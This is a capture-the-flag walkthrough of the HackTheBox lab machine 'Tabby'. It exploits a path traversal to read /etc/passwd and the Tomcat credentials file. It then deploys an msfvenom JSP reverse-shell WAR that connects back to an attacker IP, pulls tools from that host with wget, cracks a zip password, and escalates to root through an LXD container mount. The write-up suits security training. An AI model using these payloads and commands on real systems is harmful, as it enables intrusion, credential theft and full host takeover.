Enumeration
export ip=10.10.10.194
ping $ip # ttl 63
nmap -sC -sV $ip -p-
| Port | Service | Notes |
|---|---|---|
| 22 | ssh | OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) |
| 80 | http | Apache httpd 2.4.41 ((Ubuntu)) |
| 8080 | http | Apache Tomcat |
| Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel |
HTTP
Investigating the port 80 http service shows a couple of interesting pieces of info from the root page:
sales@megahosting.com
http://megahosting.htb/news.php?file=statement
Adding the hostname to the local dns resolver:
echo "address=/megahosting.htb/$ip" | sudo tee /etc/NetworkManager/dnsmasq.d/domains.conf
sudo systemctl restart NetworkManager
Additionally checking http://10.10.10.194:8080/ shows a default Apache tomcat installation, with he manager running. Trying to log into the manager with a few test credentials or the defaults doesn’t work, but the error pages shows a couple of interesting file paths:
/etc/tomcat9/tomcat-users.xml
/usr/share/tomcat9
/var/lib/tomcat9/webapps/ROOT/index.html
Checking the docs links gives that this is Version 9.0.31
LFI
Testing the file parameter for Local file Inclusion finds that the passwd file can be retreived:
http://megahosting.htb/news.php?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
Checking the the Tomcat tomcat-users.xml int he loctions indicated doesn’t have much success. Checking the packaging format in the debian archive at https://packages.debian.org/bullseye/all/tomcat9/filelist shows that there is an installation directory with an etc directory at /usr/share/tomcat9/etc/tomcat-users.xml. Checking for this file by the LFI shows:
curl http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
Retrieves
* Trying 10.10.10.194:80...
* Connected to megahosting.htb (10.10.10.194) port 80 (#0)
> GET /news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1
> Host: megahosting.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 23 Jul 2023 17:25:35 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 2325
< Content-Type: text/html; charset=UTF-8
<
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the <!.. ..> that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
* Connection #0 to host megahosting.htb left intact
which hives the credentials tomcat and $3cureP4s5w0rd123!
This works to log into the tomcat manager.
Tomcat Manager
Using these credentials, fuzzing the manager shows a /text endpoint. According to documentation this supports deploying WAR extensions.
Testing the endpoint:
curl -u tomcat:'$3cureP4s5w0rd123!' http://$ip:8080/manager/text/list
Shows valid results Using the add and start endpoints its possible to craft a fake TomCat extension with a remote shell and deploy it.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f war -o revshell.war
# listener
nc -lvnp 4444
# deploy
curl -u tomcat:'$3cureP4s5w0rd123!' -T revshell.war http://$ip:8080/manager/text/deploy?path=/revshell&update=true
# Spike
curl http://$ip:8080/revshell/
# shell connected
whoami # tomcat
id -a # 997:997
# shell stabilisation
python3 -c 'import pty; pty.spawn("/bin/bash")'
# (inside the nc session) CTRL+Z;
stty -a
stty raw -echo; fg;
ls; export SHELL=/bin/bash; export TERM=screen; stty rows 32 columns 100; reset;
This gets to a low-privileged shell.
Horizontal Privilege Escalation via usnafe reused credential
Grabbing linpeas for enumeration
python -m http.server
# victim
wget http://10.10.14.11/linpeas.sh
sh linpeas.sh > o
less -r o
Checking the web folder
ll /var/www/html
ll /var/www/html/files/
File 16162020_backup.zip looks interesting.
cp /var/www/html/files/16162020_backup.zip /tmp
unzip /tmp/16162020_backup.zip # password locked, noo with $3cureP4s5w0rd123!
python3 -m http.server
# local pc
wget http://$ip:8000/16162020_backup.zip
fcrackzip -v -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
# admin@it
unzip /tmp/16162020_backup.zip # admin@it
Nothing jumps out as interesting in the zip, but it’s another password. Trying this sfor user ash on the reverse shell:
su ash # admin@it
cat ~/user.txt
LXC Mount Manipualtion for Vertical Privelge Escalation
id -a
# uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
lxc image list
/snap/bin/lxc image list
# no images
Containers can sometimes be used to mount the rootfs, and bypass the need to get root on the host since the container has root. An lxc image is needed. An alpine image will be the smallest and easiest to get to the victim, since it can’t see the internet to automatically download.
# kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
python -m http.server
# victim
wget http://10.10.14.11:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
The victim needs the path fixing for snaps, looks like it has a typo
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Now onto setting up the lxc container
lxd init
# no for all but make a new storage pool
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias alpine
lxc init alpine mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
cd /mnt/root
ls
cat root/root.txt